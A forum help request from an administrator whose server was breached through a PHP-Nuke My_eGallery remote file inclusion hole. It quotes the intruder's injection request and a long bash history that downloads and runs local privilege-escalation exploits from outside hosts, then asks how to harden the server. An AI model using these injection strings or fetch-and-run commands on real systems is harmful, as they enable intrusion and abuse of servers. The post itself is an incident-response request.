Server Hacked - PHP source injection vulnerability used to gain acess - HELP!!
TTdummyfile
brk
kmx
krad
phpyLiy4H
ptrace
pwned
r0nin
uselib24
----
And there were 50,000 mails in queue.
-----
The intruder used the My_eGallery module in php-nuke to write files in /tmp. The entry in access_log looked like this;
xxx.x.xx.xxx - - [xx/Jun/2005:18:10:17 +1030] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.segfaultbr.hpgvip.com.br/tool25.gif?&cmd=cd%20/tmp;curl%20-o%20r0nin%20http://www.ciget.com.ve/.0/r0nin;chmod%20777%20;r0nin./r0nin HTTP/1.1" 200 10257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
---------
The /var/tmp/.bash_history shows he executed the following commands;
ps x
cd /tmp
ls
curl -o brk http://www.ciget.com.ve/.0/brk
chmod 777 brk
./brk
uname -a
curl -o krad http://www.ciget.com.ve/.0/krad
chmod 777 krad
./krad
wget http://www.ciget.com.ve/.0/
curl -o ptrace http://www.ciget.com.ve/.0/ptrace
chmod 777 ptrace
./ptrace
./ptrace
./ptrace
./ptrace
./ptrace
curl -o kmx jihad.hpgvip.ig.com.br/kmx
chmod 777 kmx
./kmx
curl -o uselib24 http://www.ciget.com.ve/.0/uselib24
chmod 777 uselib24
./uselib24
curl -o pwned http://www.ciget.com.ve/.0/pwned
chmod 777 pwned
./pwned
./uselib24
./uselib24
./uselib24
ls
./ptrace
./kmx
./brk
cd /dev/shm
ls
curl -o uselib24 http://www.ciget.com.ve/.0/uselib24
chmod 777 uselib24
./uselib24
curl -o elflbl http://www.ciget.com.ve/.0/elflbl
chmod 777 elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./uselib24
elflbl -f
./elflbl -f
curl -o brk2 http://www.ciget.com.ve/.0/brk2
chmod 777 brk2
./brk2
curl -o ptrace http://www.ciget.com.ve/.0/ptrace
chmod 777 ptrace
./ptrace
curl -o kmod http://www.ciget.com.ve/.0/kmod
chmod 777 kmod
./kmod
./kmod
curl -o mremap2 http://www.ciget.com.ve/.0/mremap2
chmod 777 mremap2
./mremap2
mremap2
./mremap2
curl -o rap http://www.ciget.com.ve/.0/raptor_chown
chmod 777 rap
./rap
./rap
./rap
./rap pwned
curl -o w00t http://www.ciget.com.ve/.0/w00t
chmod 777 w00t
./w00t
ls
./uselib24
ps x
cd /var/tmp
ls
mkdir .c
cd .c.
ls
cd .c
ls
uname -a
uptime
wget jove.prohosting.com/cndrcorp/c.txt
cd /dev/shm
ls
./ptrace
wget http://212.112.243.70/.cartao/cartao.html
ls
pwd
mkdir ,c
cd ,c
pwd
wget http://212.112.243.70/.cartao/cartao.html
cd /tmp
ls
wget http://212.112.243.70/.cartao/cartao.html
wget jove.prohosting.com/cndrcorp/c.txt
-------
My datacenter tech told me;
"Judging from the history at /var/tmp/.bash_history, it does not appear they managed to do anything other than send spam e-mails. They attempted to run some local exploits on the server, but did not successfully gain root access....these are all old exploits and patched in your particular kernel (Enterprise Linux)."
If i were to believe the tech. then how did the intruder manage to get 50,000 mails in queue?
--------
I was told to disable "allow_url_fopen" in php.ini and this will disallow the php file injection.
Does this ensure server will be safe from these attacks in future?
------
Can i rest assured that the intruder was not able to cause any damage and compromise my server?
------
What needs to be done so that requests such as following are disallowed?
/modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt
---------
